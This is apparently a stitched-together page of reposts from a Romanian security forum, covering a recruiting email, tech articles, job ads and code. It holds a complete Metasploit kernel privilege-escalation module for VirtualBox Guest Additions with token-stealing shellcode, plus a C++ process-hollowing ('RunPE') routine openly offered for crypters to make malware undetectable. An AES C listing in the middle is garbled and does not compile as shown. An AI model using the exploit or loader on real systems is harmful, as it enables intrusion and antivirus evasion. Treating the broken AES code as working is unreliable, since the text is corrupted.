Nytro

Aici postati reclamatii la adresa staff-ului: administratori si moderatori. Nu ca le-am acorda prea multa importanta, dar va veti simti mai bine. Nu mai postati aici plangeri despre tepe. Si sa nu vad plangeri legate de tepe luate de la useri cu mai putin de 50-100 de posturi.

Suntem tot aici

Kewl

Am discutat in trecut cu cineva de la Amazon si azi am primit acest mail. I wanted to let you know that Amazon is coming to Poland and Romania for a recruiting event. Amazon—a place where builders can build. We hire the world's brightest minds and offer them an environment in which they can invent and innovate to improve the experience for our customers. We want employees who will help share and shape our mission to be Earth's most customer-centric company. Amazon's evolution from Web site, to e-commerce partner, to development platform, is driven by the spirit of invention that is part of our DNA. We do this every day by solving complex technical and business problems with ingenuity and simplicity. We're making history, and the good news is that we've only just begun. Sound interesting? I would love for you to send back the questions below along with your most recent resume. · Are you open to relocating to Seattle, UK or Canada with relocation assistance for the right opportunity? Please list order of preference: · Do you have a university degree? What was it in? · Will you currently or in the future need work sponsorship from Amazon? If yes, could you explain what visa you are currently on, and when it will expire? · What is your current compensation (base, bonus, equity) and what would you expect to see in a future offer? · Have you ever interviewed with Amazon.com US or internationally? If yes, when and with which team? · Are you currently an individual contributor or a people manager? If you are a manager, how many direct reports do you currently have? · Are you currently interviewing with other companies? Do you have or are you expecting to have an upcoming offer deadline from another company? Please send me a confirmation email ASAP with your updated resume for review. We value your referrals, please don’t hesitate to share my information with any of your friends/colleagues who may be interested. Daca e cineva interesat sa imi dea CV-ul pe PM.

Mentiune: cryptarea/decryptarea se face pe blocuri de 16 bytes. Adica 128 de biti. Adica e AES pe 128 de biti. (sa inteleaga toata lumea)

VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation', 'Description' => %q{ A vulnerability within the VBoxGuest driver allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest Additions up to 4.3.10r93012. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ ['CVE', '2014-2477'], ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt'] ], 'DisclosureDate'=> 'Jul 15 2014', 'DefaultTarget' => 0 })) end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") if not proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil else vprint_good("#{address} is now writable") end result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil else vprint_good("Contents successfully written to 0x#{address.to_s(16)}") end return address end def check if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) os = sysinfo["OS"] unless (os =~ /windows xp.*service pack 3/i) return Exploit::CheckCode::Safe end file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys" unless file?(file_path) return Exploit::CheckCode::Unknown end major, minor, build, revision, branch = file_version(file_path) vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") unless (major == 4) return Exploit::CheckCode::Safe end case minor when 0 return Exploit::CheckCode::Vulnerable if build < 26 when 1 return Exploit::CheckCode::Vulnerable if build < 34 when 2 return Exploit::CheckCode::Vulnerable if build < 26 when 3 return Exploit::CheckCode::Vulnerable if build < 12 end return Exploit::CheckCode::Safe end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device") end print_status("Disclosing the HalDispatchTable address...") hal_dispatch_table = find_haldispatchtable if hal_dispatch_table.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable") else print_good("Address successfully disclosed.") end print_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil? hal_base = hal_info[0] print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}") hali_query_system_information = hal_base + target['HaliQuerySystemInfo'] print_status("Storing the shellcode in memory...") this_proc = session.sys.process.open restore_ptrs = "\x31\xc0" # xor eax, eax restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax kernel_shell = token_stealing_shellcode(target) kernel_shell_address = 0x1 buf = "\x90" * 0x6000 buf[0, 56] = "\x50\x00\x00\x00" * 14 buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell result = fill_memory(this_proc, kernel_shell_address, buf.length, buf) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory") else print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}") end print_status("Triggering the vulnerability, corrupting the HalDispatchTable...") session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The exploitation wasn't successful") else print_good("Exploitation successful!") end p = payload.encoded print_status("Injecting #{p.length.to_s} bytes to memory and executing it...") if execute_shellcode(p) print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation - CXSecurity.com

How to securely overwrite deleted files with a built-in Windows tool Ian Paul @ianpau Most Windows users know that when you delete a file on a PC, it isn't truly gone and can still be recovered. In fact, those deleted files are actually just sitting there on your hard drive until they are overwritten with new data. To truly wipe data, users often turn to apps like CCleaner or Eraser that wipe free space for you. But Windows also has a built-in feature called Cipher that will overwrite deleted files for you and may even free up some extra disk space in the process. Commanding Windows To use Cipher we have to dive into an area of your Windows machine that some hassle-free readers may have little experience with: the Command Prompt. Don't worry, though. While the command line can be a scary place, Cipher is a fairly safe feature. That said, it's always best to make sure you have your data backed up before giving something like this a try. Also, make sure you type the command correctly to avoid any unintended consequences. Cipher isn't just a tool to overwrite deleted data it can also be used to encrypt data, which is not what we want in this case. Dump the deletions To get started you have to open a command prompt. To do this in Windows 8.1, hit the Windows key + S and type command prompt into the search box. Wait for the results to show up and then click the command prompt option. In Windows 7, it's easiest to click on Start > Run and then type cmd into the box and press enter. Now for the easy part. If you have a standard Windows installation type or copy and paste the following command: cipher /w:C What this tells Windows to do is to start the Cipher program. The '/w' switch says to remove any data from the available unused disk space, and C tells Windows to carry out this action on the C:\ drive. If your data is on a different drive such as a partition labeled D:\ simply substitute C for the correct drive letter. For most people, however, C will be the right choice. Now, just sit back and wait for Windows to do its magic. This is one of those tasks you should run when you're not using your PC. Consider running it overnight or during downtime on the weekend. Windows will also advise you to close as many running programs as possible to help the machine do a better job of clearing up your hard drive. Not only will cipher clean up your drive, it may also have the added benefit of returning some extra disk space to you. Recently, I let cipher run and got back about 10GB on a four year-old PC. Sursa: How to securely overwrite deleted files with a built-in Windows tool

Blackphone goes to Def Con and gets hacked—sort of Over-the-air hacks of BlackBerry, others fly under radar; tweet on Blackphone hack doesn't. by Sean Gallagher - Aug 12 2014, 10:07pm GTBST When the Blackphone team arrived at Def Con last week, they knew they were stepping into a lion’s den. In fact, that's exactly why they were there. The first generation Blackphone from SGP Technologies has been shipping for just over a month, and the company’s delegation to DefCon—including Silent Circle Chief Technology Officer Jon Callas and newly hired SGP Technologies Chief Security Officer Dan Ford—was looking to both reach a natural customer base and get help with further locking down the device. Ask and you shall receive. Jon “Justin Case” Sawyer, the CTO of Applied Cybersecurity LLC, walked up to the Blackphone table at Def Con and told them he rooted the phone. And those who followed him on Twitter received an abbreviated play-by-play. Further Reading Custom-built with privacy in mind, this handset isn’t for (Google) Play. What followed, however, was not what Sawyer or the Blackphone team counted on: a BlackBerry blogger at N4BB leapt on one of Sawyer’s tweets and wrote a story with the erroneous headline, “Blackphone Rooted Within 5 Minutes.” By the time Sawyer was presenting on Sunday at Def Con with Tim Strazzere, the story had been picked up by a number of blogs and websites—and nearly all of them didn’t bother getting further details from Sawyer or Blackphone. BlackBerry partisans gloated over the hack. But the irony is that three days earlier, researchers from Accuvant showed in a presentation at Black Hat that they could remotely attack BlackBerry phones (as well as some Android and iOS devices) with a femtocell man-in-the-middle attack, getting root without even touching the phone. So the question is whether BlackBerry fans have any room to brag, or whether they're simply safer because they're not as big a target as Android. Rooted in (a lot more than) five minutes Sawyer's Blackphone hack was in many ways already moot by the time he demonstrated it. In part, it relied on an already-patched problem in Blackphone’s remote wipe software, which Sawyer hadn’t downloaded—mostly because he bought the phone at Def Con and didn’t want to do anything over the Wi-Fi at the conference. In a conversation with Ars, Sawyer said that the hack required three vulnerabilities in all—one that is a lower-threat vulnerability to a wide range of Android-based devices and has not yet been fully disclosed. Additionally, he said, the rooting of the Blackphone required that the attacker: have physical access to the phone and connect it to a computer via USB, configure the phone against Blackphone’s set-up recommendations, not install encryption on the device, ignore an unknown application source warning, and have the phone’s PIN code. In other words, to hack the Blackphone, the hacker would have to have either obtained it from a very naïve user or bought the phone himself. Vulnerability or feature? According to the Blackphone team, the first “bug” Sawyer leveraged was in fact not really a vulnerability—he re-enabled the Android Debug Bridge (ADB) to gain developer access to the phone. ADB doesn’t provide root access by itself, but it does give full user access to the device from a USB-connected computer. The interface to ADB is “a standard part of every Android install,” SGP Technologies CEO Toby Weir-Jones said in a phone interview with Ars. ADB had been disabled by default on the Blackphone, he said, because of a bug in its implementation in PrivatOS that resulted in a USB “boot loop” when the phone’s encryption was turned on. “All we had done was remove the ability to call up the developer menu,” Weir-Jones explained. “We hadn’t isolated the bug yet and had to burn a ROM to ship the first phones.” ADB will be turned back on once the bug is fixed, as part of an over-the-air patch. In a blog post, Dan Ford explained SGP’s position on the ADB issue. “Disabling ADB is not a security measure,” he wrote. “And was never meant to be?—?it will be returning in an OTA to Blackphone in the future once the boot bug is resolved; the realities of getting a product manufactured and shipped within the available manufacturing window meant a quick fix was needed. No root or other privilege escalation was required in order for this to be performed." Sawyer disputed that assertion. “I disagree with [Ford’s] statement that enabling USB debugging when they explicitly disabled the ability to do so is not a vuln,” he tweeted. The second vulnerability leveraged in the hack went after Blackphone’s remote wipe functionality. The code that shipped on the Blackphone had been compiled with debugging enabled, which meant that an attacker could leverage the code to elevate his or her system privileges on the phone. SGP had already caught that bug independently, and it sent out a patch as part of an over-the-air update. The last piece of the attack was a previously undisclosed bug. Sawyer described that bug as “really impractical to hit, and very hard, and very low risk” as it requires that the attacker has already elevated permissions to those of a system user to pull off. Part of what kicked up the dust around Sawyer’s hack was the initial interaction he had with the Blackphone team on site. SGP doesn’t have a bug bounty program. So when someone at Blackphone’s table handed Sawyer a t-shirt after he reported his rooting, he refused it, as he had already gotten one with his purchase of the phone. But he did go and modify the one he had. “The shirt was the most impressive part of the hack, considering I had it made in minutes," Sawyer said. When Ford saw the shirt, Sawyer recounted, he laughed. Weir-Jones explained that bug bounties are contrary to the company’s philosophy of “democratic access” to information—aside from the fact that it would be too expensive for the small company. "Usually, bug bounties are run by larger companies, after they've had time to really tighten down code themselves," he explained. To be fair, BlackBerry also doesn’t have a bug bounty program. And Blackphone’s PrivatOS is open source, as are the Silent Circle applications. And as Sawyer said, the Blackphone vulnerabilities were eclipsed in severity by the attacks on the BlackBerry and other phones that were unveiled at Black Hat. “Two mobile Black Hat talks were 1000 times more impressive and scarier than my disclosure,” he posted to Twitter. Beating the baseband One attack, demonstrated at Black Hat by Mathew Solnik and Marc Blanchou, used the embedded over-the-air management interfaces used by wireless carriers to perform carrier-pushed configuration updates. They were able to gain root access to BlackBerry phones, as well as some Android phones and the Sprint configuration of some iOS devices. The devices most vulnerable to the attack were the BlackBerry Z10 and the HTC One M7. The attack takes advantage of the machine-to-machine (M2M) interface used by carriers to do remote provisioning of the phone when it’s purchased and to push out communications updates. The interface is part of the baseband configuration of the phones—it leverages the baseband processor, which is the system-on-chip that handles the connection to cellular networks. On some devices, the baseband chip can access local storage and memory used by the smart phone’s operating system and be used to gain root-level access. Mathew Solnik and Marc Blanchou demonstrate an over-the-air remote code execution and jailbreak of a Sprint iPhone getting remote root. At Def Con, Ars talked with Jon Callas and Dan Ford about the baseband question. Callas said that the baseband processor in the Blackphone, which is made by Nvidia, has no such access to the memory and storage used by PrivatOS. “It’s completely segregated,” Callas said. Blackphone is looking at ways to provide an audit of the phone’s baseband code to assure users that the cellular modem can’t be made into what amounts to a hostile router, “but we assume that it’s a hostile router in the way we developed PrivatOS,” Callas added. It’s clear that there are a number of issues left to be fixed with Blackphone. There’s an app store in the works that will provide a curated set of pre-audited Android applications, and there have been requests from some customers for a physical switch to turn off the phone’s camera and microphone. There have also been complaints about the phone’s LTE support. But for a company of about 100 people just a month into its first product’s lifecycle, SGP has already shown how serious it is about security. Ford said that the Blackphone team turned around the patch to one already-discovered issue and shipped it out as an over-the-air update “in less than 48 hours.” Sursa: Blackphone goes to Def Con and gets hacked—sort of | Ars Technica

[h=1][C] AES Implementation[/h][h=3]X-N2O[/h]I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy. // AES Implementation by X-N2O// Started: 15:41:35 - 18 Nov 2009 // Finished: 20:03:59 - 21 Nov 2009 // Logarithm, S-Box, and RCON tables are not hardcoded // Instead they are generated when the program starts // All of the code below is based from the AES specification // You can find it at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf // You may use this code as you wish, but do not remove this comment // This is only a proof of concept, and should not be considered as the most efficient implementation #include <stdlib.h> #include <string.h> #include <stdio.h> #define AES_RPOL 0x011b // reduction polynomial (x^8 + x^4 + x^3 + x + 1) #define AES_GEN 0x03 // gf(2^8) generator (x + 1) #define AES_SBOX_CC 0x63 // S-Box C constant #define KEY_128 (128/8) #define KEY_192 (192/8) #define KEY_256 (256/8) #define aes_mul(a, ((a)&&(?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(])%0xff]:0) #define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0) unsigned char g_aes_logt[256], g_aes_ilogt[256]; unsigned char g_aes_sbox[256], g_aes_isbox[256]; typedef struct { unsigned char state[4][4]; int kcol; size_t rounds; unsigned long keysched[0]; } aes_ctx_t; void aes_init(); aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen); inline unsigned long aes_subword(unsigned long w); inline unsigned long aes_rotword(unsigned long w); void aes_keyexpansion(aes_ctx_t *ctx); inline unsigned char aes_mul_manual(unsigned char a, unsigned char ; // use aes_mul instead void aes_subbytes(aes_ctx_t *ctx); void aes_shiftrows(aes_ctx_t *ctx); void aes_mixcolumns(aes_ctx_t *ctx); void aes_addroundkey(aes_ctx_t *ctx, int round); void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_invsubbytes(aes_ctx_t *ctx); void aes_invshiftrows(aes_ctx_t *ctx); void aes_invmixcolumns(aes_ctx_t *ctx); void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_free_ctx(aes_ctx_t *ctx); void init_aes() { int i; unsigned char gen; // build logarithm table and it's inverse gen = 1; for(i = 0; i < 0xff; i++) { g_aes_logt[gen] = i; g_aes_ilogt = gen; gen = aes_mul_manual(gen, AES_GEN); } // build S-Box and it's inverse for(i = 0; i <= 0xff; i++) { char bi; unsigned char inv = aes_inv(i); g_aes_sbox = 0; for(bi = 0; bi < 8; bi++) { // based on transformation 5.1 // could also be done with a loop based on the matrix g_aes_sbox |= ((inv & (1<<bi)?1:0) ^ (inv & (1 << ((bi+4) & 7))?1:0) ^ (inv & (1 << ((bi+5) & 7))?1:0) ^ (inv & (1 << ((bi+6) & 7))?1:0) ^ (inv & (1 << ((bi+7) & 7))?1:0) ^ (AES_SBOX_CC & (1 << bi)?1:0) ) << bi; } g_aes_isbox[g_aes_sbox] = i; } // warning: quickhack g_aes_sbox[1] = 0x7c; g_aes_isbox[0x7c] = 1; g_aes_isbox[0x63] = 0; } aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen) { aes_ctx_t *ctx; size_t rounds; size_t ks_size; switch(keyLen) { case 16: // 128-bit key rounds = 10; break; case 24: // 192-bit key rounds = 12; break; case 32: // 256-bit key rounds = 14; break; defaut: return NULL; } ks_size = 4*(rounds+1)*sizeof(unsigned long); ctx = malloc(sizeof(aes_ctx_t)+ks_size); if(ctx) { ctx->rounds = rounds; ctx->kcol = keyLen/4; memcpy(ctx->keysched, key, keyLen); ctx->keysched[43] = 0; aes_keyexpansion(ctx); } return ctx; } inline unsigned long aes_subword(unsigned long w) { return g_aes_sbox[w & 0x000000ff] | (g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) | (g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) | (g_aes_sbox[(w & 0xff000000) >> 24] << 24); } inline unsigned long aes_rotword(unsigned long w) { // May seem a bit different from the spec // It was changed because unsigned long is represented with little-endian convention on x86 // Should not depend on architecture, but this is only a POC return ((w & 0x000000ff) << 24) | ((w & 0x0000ff00) >> 8) | ((w & 0x00ff0000) >> 8) | ((w & 0xff000000) >> 8); } void aes_keyexpansion(aes_ctx_t *ctx) { unsigned long temp; unsigned long rcon; register int i; rcon = 0x00000001; for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) { temp = ctx->keysched[i-1]; if(!(i%ctx->kcol)) { temp = aes_subword(aes_rotword(temp)) ^ rcon; rcon = aes_mul(rcon, 2); } else if(ctx->kcol > 6 && i%ctx->kcol == 4) temp = aes_subword(temp); ctx->keysched = ctx->keysched[i-ctx->kcol] ^ temp; } } inline unsigned char aes_mul_manual(unsigned char a, unsigned char { register unsigned short ac; register unsigned char ret; ac = a; ret = 0; while( { if(b & 0x01) ret ^= ac; ac <<= 1; b >>= 1; if(ac & 0x0100) ac ^= AES_RPOL; } return ret; } void aes_subbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]]; } } void aes_shiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][y] = ctx->state[x][(y+x) & 0x03]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_mixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0] = aes_mul(0x02, ctx->state[0]) ^ aes_mul(0x03, ctx->state[1]) ^ ctx->state[2] ^ ctx->state[3]; nstate[1] = ctx->state[0] ^ aes_mul(0x02, ctx->state[1]) ^ aes_mul(0x03, ctx->state[2]) ^ ctx->state[3]; nstate[2] = ctx->state[0] ^ ctx->state[1] ^ aes_mul(0x02, ctx->state[2]) ^ aes_mul(0x03, ctx->state[3]); nstate[3] = aes_mul(0x03, ctx->state[0]) ^ ctx->state[1] ^ ctx->state[2] ^ aes_mul(0x02, ctx->state[3]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_addroundkey(aes_ctx_t *ctx, int round) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8)); } } void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input; aes_addroundkey(ctx, 0); for(i = 1; i < ctx->rounds; i++) { aes_subbytes(ctx); aes_shiftrows(ctx); aes_mixcolumns(ctx); aes_addroundkey(ctx, i); } aes_subbytes(ctx); aes_shiftrows(ctx); aes_addroundkey(ctx, ctx->rounds); // copy state to output for(i = 0; i < 16; i++) output = ctx->state[i & 0x03][i >> 2]; } void aes_invshiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][(y+x) & 0x03] = ctx->state[x][y]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_invsubbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]]; } } void aes_invmixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0] = aes_mul(0x0e, ctx->state[0]) ^ aes_mul(0x0b, ctx->state[1]) ^ aes_mul(0x0d, ctx->state[2]) ^ aes_mul(0x09, ctx->state[3]); nstate[1] = aes_mul(0x09, ctx->state[0]) ^ aes_mul(0x0e, ctx->state[1]) ^ aes_mul(0x0b, ctx->state[2]) ^ aes_mul(0x0d, ctx->state[3]); nstate[2] = aes_mul(0x0d, ctx->state[0]) ^ aes_mul(0x09, ctx->state[1]) ^ aes_mul(0x0e, ctx->state[2]) ^ aes_mul(0x0b, ctx->state[3]); nstate[3] = aes_mul(0x0b, ctx->state[0]) ^ aes_mul(0x0d, ctx->state[1]) ^ aes_mul(0x09, ctx->state[2]) ^ aes_mul(0x0e, ctx->state[3]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i, j; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input; aes_addroundkey(ctx, ctx->rounds); for(i = ctx->rounds-1; i >= 1; i--) { aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, i); aes_invmixcolumns(ctx); } aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, 0); // copy state to output for(i = 0; i < 16; i++) output = ctx->state[i & 0x03][i >> 2]; } void aes_free_ctx(aes_ctx_t *ctx) { free(ctx); } int main(int argc, char *argv[]) { unsigned char key[KEY_128] = "uber strong key!"; unsigned char ptext[16] = "Attack at dawn!"; unsigned char ctext[16]; unsigned char decptext[16]; aes_ctx_t *ctx; init_aes(); ctx = aes_alloc_ctx(key, sizeof(key)); if(!ctx) { perror("aes_alloc_ctx"); return EXIT_FAILURE; } aes_encrypt(ctx, ptext, ctext); aes_decrypt(ctx, ctext, decptext); puts(decptext); aes_free_ctx(ctx); return EXIT_SUCCESS; } In the attached zip you will also find the compiled ELF binary. aes.zip 8.84KB 2183 downloads Sursa: [C] AES Implementation - Professional Code - rohitab.com - Forums

[h=1][c++] Run Program From Memory And Not File[/h][h=3]Galco[/h] void RunFromMemory(char* pImage,char* pPath){ DWORD dwWritten = 0; DWORD dwHeader = 0; DWORD dwImageSize = 0; DWORD dwSectionCount = 0; DWORD dwSectionSize = 0; DWORD firstSection = 0; DWORD previousProtection = 0; DWORD jmpSize = 0; IMAGE_NT_HEADERS INH; IMAGE_DOS_HEADER IDH; IMAGE_SECTION_HEADER Sections[1000]; PROCESS_INFORMATION peProcessInformation; STARTUPINFO peStartUpInformation; CONTEXT pContext; char* pMemory; char* pFile; memcpy(&IDH,pImage,sizeof(IDH)); memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH)); dwImageSize = INH.OptionalHeader.SizeOfImage; pMemory = (char*)malloc(dwImageSize); memset(pMemory,0,dwImageSize); pFile = pMemory; dwHeader = INH.OptionalHeader.SizeOfHeaders; firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections); memcpy(pFile,pImage,dwHeader); if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = INH.OptionalHeader.SizeOfHeaders; } else { jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) { jmpSize = 0; dwSectionSize = Sections[dwSectionCount].SizeOfRawData; memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize); if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = Sections[dwSectionCount].Misc.VirtualSize; } else { jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); } memset(&peStartUpInformation,0,sizeof(STARTUPINFO)); memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION)); memset(&pContext,0,sizeof(CONTEXT)); peStartUpInformation.cb = sizeof(peStartUpInformation); if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation)) { hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); pContext.ContextFlags = CONTEXT_FULL; GetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten); pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0); ResumeThread(peProcessInformation.hThread); } free(pMemory); } This function will run a process based on it's memory instead of running a process from a file. Meaning, you can use this in crypters to have fud runtime. You can basically load an exe as a resource into your code and run it as a process like this: int main(int argc,char* argv[]){ HGLOBAL hResData; HRSRC hResInfo; void *pvRes; DWORD dwSize; char* lpMemory; HMODULE hModule = GetModuleHandle(NULL); if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL)) { dwSize = SizeofResource(hModule, hResInfo); lpMemory = (char*)malloc (dwSize); memset(lpMemory,0,dwSize); memcpy (lpMemory, pvRes, dwSize); RunFromMemory(lpMemory,argv[0]); } } The program running the process must have the same image base or else it will not work. Sursa: [c++] Run Program From Memory And Not File - Professional Code - rohitab.com - Forums

[h=1]Incident Management Sr. Advisor[/h] [h=4]Bucharest, Romania[/h] We are currently looking for an Incident Management Sr. Advisor that will be part of Dell's internal security team. Responsibilities: • Respond to critical computer security incidents by collecting, analyzing and preserving digital evidence • Assemble and coordinate with technical teams and third-party vendors to resolve incidents as quickly and efficiently as possible • Communicate status of response, resolution and final root cause analysis to the appropriate stakeholders • Ensure that all incidents are recorded and tracked to meet audit and legal requirements • Conduct root cause analysis to identify gaps and recommendations ultimately remediating risks • Communicate effectively with representatives of the Lines of Business, technology specialists, and vendors • Gather forensic evidence for disciplinary action or criminal investigation • Partner with all business lines to investigate internal code of conduct, fraud and other investigations as instructed by the CISO • Conduct advanced computer and network forensic investigation functions relating to various forms of electronic fraud, identity theft, e-commerce fraud, computer intrusion, theft of information, denial of service, multi-national organized electronic criminal groups, as well as financial fraud investigations • Perform other essential duties as assigned • Some basic system administration duties • Vendor communications for technical support where required Qualifications: Requirements: • 